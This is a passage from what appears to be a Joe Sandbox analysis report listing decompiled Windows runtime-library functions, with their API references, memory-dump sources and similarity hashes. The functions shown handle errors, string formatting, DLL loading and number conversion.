						return E0042C0FF(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x00442ff2
0x00442fff
0x00443005
0x0044300d
0x0044301b
0x00000000
0x00000000
0x00000000
0x00000000
0x00443023
0x00443023
0x00443025
0x00443037
0x00000000
0x00000000
0x00443039
0x00443049
0x00000000
0x00000000
0x00443051
0x00443053
0x00443054
0x0044306c
0x00443073
0x00000000
0x00443081
0x00000000
0x0044307c
0x0044300d
0x00443001
0x00443001
0x00000000

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00442E0A,?,004517E8,0000000C,00442FCB,?,?,?), ref: 00443041
GetLastError.KERNEL32(?,00442E0A,?,004517E8,0000000C,00442FCB,?,?,?), ref: 0044304B
__dosmaperr.LIBCMT ref: 00443076

Strings

XJl, xrefs: 00443005

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: XJl
API String ID: 2583163307-3548130534
Opcode ID: 75ff8f2c37812155f1906480bf6db6c993b180faa7e24ddc41522cd20dd33ea2
Instruction ID: 8227a9dbb0c0f7beb13fd594a499e49362d1da9145c1c1dae4fe959dc2bf37e0
Opcode Fuzzy Hash: 75ff8f2c37812155f1906480bf6db6c993b180faa7e24ddc41522cd20dd33ea2
Instruction Fuzzy Hash: F3016B32E0812016E6241F346C4677F27594B82F3AF25035FF818872CBCE6DCE81418D

Uniqueness

Uniqueness Score: -1.00%

Function 00403FE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FE0(void* __ecx, WCHAR* _a4, char _a8) {
				signed int _v8;

				if(( *_a4 & 0x0000ffff) == 0x25) {
					_v8 = lstrlenW(_a4);
					if(_v8 < 2 || ( *(_a4 + _v8 * 2 - 2) & 0x0000ffff) != 0x25) {
						return 0;
					} else {
						_t11 =  &_a8; // 0x40383f
						if(CompareStringW(0x400, 0x1001,  &(_a4[1]), _v8 - 2,  *_t11, 0xffffffff) == 2) {
							_t14 =  &_a8; // 0x40383f
							if(GetEnvironmentVariableW( *_t14, 0, 0) <= 0) {
								return 1;
							}
							return 0;
						}
						return 0;
					}
				}
				return 0;
			}

0x00403ff6
0x00404006
0x0040400d
0x00000000
0x00404023
0x00404025
0x0040404a
0x00404054
0x00404060
0x00000000
0x00404066
0x00000000
0x00404062
0x00000000
0x0040404c
0x0040400d
0x00000000

APIs

lstrlenW.KERNEL32(?,?,?,0040383F,?,ERRORLEVEL), ref: 00404000

Strings

?8@, xrefs: 00404025, 00404054, 00404028, 00404057

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: lstrlen
String ID: ?8@
API String ID: 1659193697-2973075156
Opcode ID: b876bd5075ef560ee6c9f7a0238ac460ccd7feb2e38e0354ad257323198aa303
Instruction ID: 827f6cc6e5b304599c3e2476905b1d0873184d079974c6a118d6bd152e4a9b71
Opcode Fuzzy Hash: b876bd5075ef560ee6c9f7a0238ac460ccd7feb2e38e0354ad257323198aa303
Instruction Fuzzy Hash: E6118EB0200104ABC764CF68C986A6B37B5AB85701F208529FB07FB2D0D635ED419668

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8F7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E0040A8F7(void* __ecx, intOrPtr _a4, long long _a8) {
				char _v8;
				long long _v12;
				wchar_t* _t9;
				wchar_t* _t14;
				int _t23;
				long long* _t25;

				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				asm("fst qword [ebp-0x8]");
				 *_t25 = _a8;
				_t14 = "%lf";
				_t2 = E00411444(0, 0, _t14, __ecx) + 1; // 0x1
				_t23 = _t2;
				_t9 = E0040E436(0x456034, _t23);
				 *((long long*)(_t25 + 0x14)) = _v12;
				swprintf(_t9, _t23, _t14, 0x456034, 0x456034);
				_v8 = 0;
				_push(_v8);
				E0040A529(_a4, _t9);
				return _a4;
			}

0x0040a8fa
0x0040a8fb
0x0040a902
0x0040a904
0x0040a907
0x0040a90a
0x0040a921
0x0040a921
0x0040a925
0x0040a931
0x0040a937
0x0040a942
0x0040a946
0x0040a94a
0x0040a956

APIs

___swprintf_l.LIBCMT ref: 0040A914
swprintf.LIBCMT ref: 0040A937

Part of subcall function 0041145E: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00411470

Strings

%lf, xrefs: 0040A90A, 0040A90F, 0040A934
4`E, xrefs: 0040A91C

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_c_lswprintf
String ID: %lf$4`E
API String ID: 3115136581-114568980
Opcode ID: fabdf5c65f042b54850ac9beb15d0a2d609970989bc46b5706e1d33b635e0eb8
Instruction ID: f7442f4d9aaa87d57a81e9a688fd63f129fe145c1f592bf64d9fa09aa38e9916
Opcode Fuzzy Hash: fabdf5c65f042b54850ac9beb15d0a2d609970989bc46b5706e1d33b635e0eb8
Instruction Fuzzy Hash: 6EF0C2B1500008BADB10AB96DC4AFFF7B6CDB45758F01409DF64527182DB395E14937A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E0040A957(void* __ecx, intOrPtr _a4, long long _a8) {
				char _v8;
				wchar_t* _t9;
				wchar_t* _t14;
				int _t23;
				long long* _t25;

				_push(__ecx);
				_push(__ecx);
				 *_t25 = _a8;
				_t14 = "%lf";
				_t2 = E00411444(0, 0, _t14, __ecx) + 1; // 0x1
				_t23 = _t2;
				_t9 = E0040E436(0x456034, _t23);
				 *((long long*)(_t25 + 0x14)) = _a8;
				swprintf(_t9, _t23, _t14, 0x456034, 0x456034);
				_v8 = 0;
				_push(_v8);
				E0040A529(_a4, _t9);
				return _a4;
			}

0x0040a95a
0x0040a961
0x0040a963
0x0040a966
0x0040a97d
0x0040a97d
0x0040a981
0x0040a98d
0x0040a993
0x0040a99e
0x0040a9a2
0x0040a9a6
0x0040a9b2

APIs

___swprintf_l.LIBCMT ref: 0040A970
swprintf.LIBCMT ref: 0040A993

Part of subcall function 0041145E: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00411470

Strings

4`E, xrefs: 0040A978
%lf, xrefs: 0040A966, 0040A96B, 0040A990

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ___swprintf_l__vswprintf_c_lswprintf
String ID: %lf$4`E
API String ID: 3115136581-114568980
Opcode ID: f6e544ea360b4294cc9ffc53fa894f61ce175a0f86f462f9395a486808df6f56
Instruction ID: be0815af3dbf3fcc495df89868d8de20f12299ff624bbfcb0040ef72e7b42181
Opcode Fuzzy Hash: f6e544ea360b4294cc9ffc53fa894f61ce175a0f86f462f9395a486808df6f56
Instruction Fuzzy Hash: F8F09671100008BADB10AB56DC45FFF7B6CDB45758F01809EFB4917182DB399D14937A

Uniqueness

Uniqueness Score: -1.00%

Function 00411916 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00411916(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E0042BDB8(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x00411923
0x0041192b
0x00411960
0x0041192d
0x00411936
0x00000000
0x0041195d
0x0041195c
0x0041195c

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00411813,00000000,?,00455FF0,?,?,?,00411A6A,00000004,InitializeCriticalSectionEx,0044A5BC,InitializeCriticalSectionEx), ref: 00411923
GetLastError.KERNEL32(?,00411813,00000000,?,00455FF0,?,?,?,00411A6A,00000004,InitializeCriticalSectionEx,0044A5BC,InitializeCriticalSectionEx,00000000,?,0040A45C), ref: 0041192D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00411955

Strings

api-ms-, xrefs: 0041193A

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 26a5b757b8a8119ed870a3ca4b3bef17c0a8819d29f4c556e78f8f25e90ee862
Instruction ID: 9a6c691a50333b34b312be732b75c3ae9042ad31ae519a9fcf06124788047943
Opcode Fuzzy Hash: 26a5b757b8a8119ed870a3ca4b3bef17c0a8819d29f4c556e78f8f25e90ee862
Instruction Fuzzy Hash: 05E01270290205B7EF501B61EC06B9A3F55AB02B90F104032FB0DA41E1D765A951D54D

Uniqueness

Uniqueness Score: -1.00%

Function 0042F4D8 Relevance: 6.3, APIs: 4, Instructions: 320
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E0042F4D8(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t119;
				signed int* _t120;
				void* _t123;
				signed int _t125;
				signed int _t131;
				signed int* _t132;
				signed int* _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				void* _t158;
				unsigned int _t159;
				signed int _t166;
				void* _t167;
				signed int _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t186;

				_t167 = __edx;
				_t180 = _a24;
				if(_t180 < 0) {
					_t180 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E0041334C( &_v60, _t167, _a36);
				_t5 = _t180 + 0xb; // 0xb
				_t192 = _a12 - _t5;
				if(_a12 > _t5) {
					_t135 = _a4;
					_t141 = _t135[1];
					_t168 =  *_t135;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t169 = _t184 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t85;
							_v40 = _t169;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t91 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t184 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t185 =  &(_t169[0]);
								_v16 = _t185;
								__eflags = _t180;
								if(_t180 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t143;
								}
								 *_t169 = _t95;
								_t97 = _t135[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t170 = _t143;
									_t144 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t180;
										if(_t180 <= 0) {
											break;
										}
										_t123 = E004452D0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
										_t158 = 0x30;
										_t125 = _t123 + _t158 & 0x0000ffff;
										__eflags = _t125 - 0x39;
										if(_t125 > 0x39) {
											_t125 = _t125 + _v32;
											__eflags = _t125;
										}
										_t159 = _v24;
										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
										 *_t185 = _t125;
										_t185 = _t185 + 1;
										_t144 = _t159 >> 4;
										_t98 = _v12 - 4;
										_t180 = _t180 - 1;
										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
										_v24 = _t159 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v16 = _t185;
									__eflags = _t98;
									if(_t98 < 0) {
										goto L42;
									}
									_t119 = E004452D0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
									__eflags = _t119 - 8;
									if(_t119 <= 8) {
										goto L42;
									}
									_t120 = _t185 - 1;
									_t139 = 0x30;
									while(1) {
										_t153 =  *_t120;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											_t135 = _a4;
											__eflags = _t120 - _v40;
											if(_t120 == _v40) {
												_t54 = _t120 - 1;
												 *_t54 =  *(_t120 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 != 0x39) {
													_t154 = _t153 + 1;
													__eflags = _t154;
												} else {
													_t154 = _v32 + 0x3a;
												}
												 *_t120 = _t154;
											}
											goto L42;
										}
										L35:
										 *_t120 = _t139;
										_t120 = _t120 - 1;
									}
								} else {
									__eflags =  *_t135 - _t143;
									if( *_t135 <= _t143) {
										L42:
										__eflags = _t180;
										if(_t180 > 0) {
											_push(_t180);
											_t115 = 0x30;
											_push(_t115);
											_push(_t185);
											E004097A0(_t180);
											_t185 = _t185 + _t180;
											__eflags = _t185;
											_v16 = _t185;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t185 = _t99;
											_v16 = _t185;
										}
										 *_t185 = (_v5 << 5) + 0x50;
										_t104 = E004452D0( *_t135, 0x34, _t135[1]);
										_t186 = 0;
										_t105 = _v16;
										_t148 = (_t104 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t172 = _t105 + 2;
										_v40 = _t172;
										if(__eflags < 0) {
											L50:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t186 =  ~_t186;
											_t136 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t136 = 0x2b;
												L51:
												 *(_t105 + 1) = _t136;
												_t181 = _t172;
												_t106 = 0x30;
												 *_t172 = _t106;
												_t107 = 0;
												__eflags = _t186;
												if(__eflags < 0) {
													L55:
													__eflags = _t181 - _t172;
													if(_t181 != _t172) {
														L59:
														_push(_t136);
														_push(_t107);
														_push(0x64);
														_push(_t186);
														_t108 = E00445020();
														_t186 = _t136;
														_t136 = _t148;
														_v32 = _t172;
														_t172 = _v40;
														 *_t181 = _t108 + 0x30;
														_t181 = _t181 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t181 - _t172;
														if(_t181 != _t172) {
															L64:
															_push(_t136);
															_push(_t107);
															_push(0xa);
															_push(_t186);
															_push(_t148);
															_t110 = E00445020();
															_v40 = _t172;
															 *_t181 = _t110 + 0x30;
															_t181 = _t181 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t181 = _t149;
															 *(_t181 + 1) = _t107;
															_t182 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t182;
														}
														__eflags = _t186 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t186 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t136 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t136);
													_push(_t107);
													_push(_t136);
													_push(_t186);
													_t113 = E00445020();
													_t186 = _t136;
													_t136 = _t148;
													_v32 = _t172;
													_t172 = _v40;
													 *_t172 = _t113 + 0x30;
													_t68 = _t172 + 1; // 0x1
													_t181 = _t68;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t184 = _t91;
							_t143 =  *_t135 | _t135[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
							_t141 = _t135[1];
							goto L14;
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t182 = E0042F7F1(_t135, _t141, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
					__eflags = _t182;
					if(_t182 == 0) {
						_t131 = E00448380(_t184, 0x65);
						__eflags = _t131;
						if(_t131 != 0) {
							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t166;
							 *_t131 = _t166;
							 *((char*)(_t131 + 3)) = 0;
						}
						_t182 = 0;
					} else {
						 *_t184 = 0;
					}
					goto L66;
				}
				_t132 = E0042C135(_t192);
				_t182 = 0x22;
				 *_t132 = _t182;
				E0042C00E();
				goto L66;
			}

0x0042f4d8
0x0042f4e3
0x0042f4e8
0x0042f4ea
0x0042f4ea
0x0042f4ee
0x0042f4f7
0x0042f4f9
0x0042f4fe
0x0042f501
0x0042f504
0x0042f51a
0x0042f51d
0x0042f522
0x0042f52c
0x0042f531
0x0042f585
0x0042f587
0x0042f596
0x0042f599
0x0042f59c
0x0042f59e
0x0042f5a5
0x0042f5b7
0x0042f5ba
0x0042f5bf
0x0042f5c3
0x0042f5c4
0x0042f5e4
0x0042f5e7
0x0042f5e7
0x0042f5e7
0x0042f5e9
0x0042f5e9
0x0042f5ec
0x0042f5ef
0x0042f5f1
0x0042f602
0x0042f5f3
0x0042f5f3
0x0042f5f3
0x0042f604
0x0042f609
0x0042f609
0x0042f60e
0x0042f611
0x0042f61b
0x0042f61d
0x0042f61f
0x0042f624
0x0042f625
0x0042f628
0x0042f62b
0x0042f62e
0x0042f62e
0x0042f630
0x00000000
0x00000000
0x0042f647
0x0042f64e
0x0042f652
0x0042f655
0x0042f658
0x0042f65a
0x0042f65a
0x0042f65a
0x0042f660
0x0042f663
0x0042f667
0x0042f669
0x0042f66d
0x0042f670
0x0042f673
0x0042f674
0x0042f677
0x0042f67a
0x0042f67d
0x0042f67d
0x0042f682
0x0042f685
0x0042f688
0x00000000
0x00000000
0x0042f69f
0x0042f6a4
0x0042f6a8
0x00000000
0x00000000
0x0042f6ac
0x0042f6af
0x0042f6b0
0x0042f6b0
0x0042f6b2
0x0042f6b5
0x00000000
0x00000000
0x0042f6b7
0x0042f6ba
0x0042f6c1
0x0042f6c4
0x0042f6c7
0x0042f6dc
0x0042f6dc
0x0042f6dc
0x0042f6c9
0x0042f6c9
0x0042f6cc
0x0042f6d6
0x0042f6d6
0x0042f6ce
0x0042f6d1
0x0042f6d1
0x0042f6d8
0x0042f6d8
0x00000000
0x0042f6c7
0x0042f6bc
0x0042f6bc
0x0042f6be
0x0042f6be
0x0042f613
0x0042f613
0x0042f615
0x0042f6df
0x0042f6df
0x0042f6e1
0x0042f6e3
0x0042f6e6
0x0042f6e7
0x0042f6e8
0x0042f6e9
0x0042f6f1
0x0042f6f1
0x0042f6f3
0x0042f6f3
0x0042f6f6
0x0042f6f9
0x0042f6fc
0x0042f6fe
0x0042f700
0x0042f700
0x0042f70d
0x0042f714
0x0042f71b
0x0042f71d
0x0042f726
0x0042f726
0x0042f729
0x0042f72b
0x0042f72e
0x0042f731
0x0042f73d
0x0042f73d
0x0042f741
0x0042f744
0x0042f746
0x00000000
0x0042f733
0x0042f733
0x0042f739
0x0042f739
0x0042f747
0x0042f747
0x0042f74a
0x0042f74e
0x0042f74f
0x0042f751
0x0042f753
0x0042f755
0x0042f77f
0x0042f77f
0x0042f781
0x0042f78e
0x0042f78e
0x0042f78f
0x0042f790
0x0042f792
0x0042f794
0x0042f799
0x0042f79b
0x0042f79f
0x0042f7a2
0x0042f7a5
0x0042f7a7
0x0042f7a8
0x0042f7a8
0x0042f7aa
0x0042f7aa
0x0042f7ac
0x0042f7b9
0x0042f7b9
0x0042f7ba
0x0042f7bb
0x0042f7bd
0x0042f7be
0x0042f7bf
0x0042f7c8
0x0042f7cb
0x0042f7cd
0x0042f7ce
0x0042f7ce
0x0042f7d0
0x0042f7d0
0x0042f7d0
0x0042f7d3
0x0042f7d5
0x0042f7d8
0x0042f7da
0x0042f7e0
0x0042f7e5
0x0042f7e5
0x0042f7f0
0x0042f7f0
0x0042f7ae
0x0042f7b0
0x00000000
0x00000000
0x0042f7b2
0x00000000
0x00000000
0x0042f7b4
0x0042f7b7
0x00000000
0x00000000
0x00000000
0x0042f7b7
0x0042f783
0x0042f785
0x00000000
0x00000000
0x0042f787
0x00000000
0x00000000
0x0042f789
0x0042f78c
0x00000000
0x00000000
0x00000000
0x0042f78c
0x0042f757
0x0042f75c
0x0042f762
0x0042f762
0x0042f763
0x0042f764
0x0042f765
0x0042f767
0x0042f76c
0x0042f76e
0x0042f770
0x0042f775
0x0042f778
0x0042f77a
0x0042f77a
0x0042f77d
0x0042f77d
0x00000000
0x0042f77d
0x0042f75e
0x0042f760
0x00000000
0x00000000
0x00000000
0x0042f760
0x0042f735
0x0042f737
0x00000000
0x00000000
0x00000000
0x0042f737
0x0042f731
0x00000000
0x0042f615
0x0042f611
0x0042f5c6
0x0042f5d2
0x0042f5d2
0x0042f5d4
0x0042f5db
0x00000000
0x0042f5db
0x0042f5d6
0x00000000
0x0042f5d6
0x0042f589
0x0042f58f
0x0042f58f
0x0042f592
0x0042f592
0x0042f593
0x00000000
0x0042f593
0x0042f58b
0x0042f58d
0x00000000
0x00000000
0x00000000
0x0042f58d
0x0042f54b
0x0042f550
0x0042f552
0x0042f55f
0x0042f566
0x0042f568
0x0042f573
0x0042f573
0x0042f576
0x0042f578
0x0042f578
0x0042f57c
0x0042f554
0x0042f554
0x0042f554
0x00000000
0x0042f552
0x0042f506
0x0042f50d
0x0042f50e
0x0042f510
0x00000000

APIs

_strrchr.LIBCMT ref: 0042F55F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 25d43667acb3fb4e28a843bd899e16b90dc9ca1e4c3782610acd6964cf6b56e9
Instruction ID: e81e2e2fc1c0a7ee9f7f2e5b00d26382fb07f1aade6ab903a449b35197c56393
Opcode Fuzzy Hash: 25d43667acb3fb4e28a843bd899e16b90dc9ca1e4c3782610acd6964cf6b56e9
Instruction Fuzzy Hash: 66B12532A002659FDB118F28D8517AEBBF5EF55300FE441BBE841DB342D6389D4ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D604 Relevance: 6.2, APIs: 4, Instructions: 192
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040D604(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t76;
				signed int _t77;
				signed int* _t79;
				signed int _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t97;
				void* _t102;
				signed int* _t103;
				signed int _t106;
				signed int* _t108;
				signed int _t115;
				signed int _t120;
				signed int _t121;
				signed int _t124;
				void* _t130;
				signed int _t145;
				signed int _t149;
				void* _t150;

				_t142 = __edi;
				_t140 = __edx;
				_t119 = __ebx;
				_push(0x28);
				E00444D8D(0x448670, __ebx, __edi, __esi);
				 *0x456030 =  *0x456030 + 1;
				 *(_t150 - 4) =  *(_t150 - 4) & 0x00000000;
				_t76 =  *0x456020; // 0x0
				if((0x00002000 & _t76) == 0) {
					_t121 =  *0x456018; // 0x0
					_t77 =  *_t121;
					__eflags = _t77 - 0x3f;
					if(_t77 != 0x3f) {
						__eflags = _t77;
						if(_t77 != 0) {
							L33:
							_push(2);
							L42:
							E0040AAF4( *(_t150 + 8));
							L43:
							_t79 =  *(_t150 + 8);
							L44:
							 *0x456030 =  *0x456030 - 1;
							return E00444D5B(_t79);
						}
						_push(1);
						goto L42;
					}
					_t10 = _t121 + 1; // 0x1
					_t81 = _t10;
					 *0x456018 = _t81;
					__eflags =  *_t81 - 0x3f;
					if( *_t81 != 0x3f) {
						L10:
						E0040FD35(_t119, _t121, _t140, _t142, 0x2000, _t150 - 0x18);
						_t149 =  *(_t150 - 0x18);
						_t120 =  *(_t150 - 0x14);
						__eflags = _t149;
						if(_t149 == 0) {
							L13:
							_t19 = _t150 - 0x10;
							 *_t19 =  *(_t150 - 0x10) & 0x00000000;
							__eflags =  *_t19;
							L14:
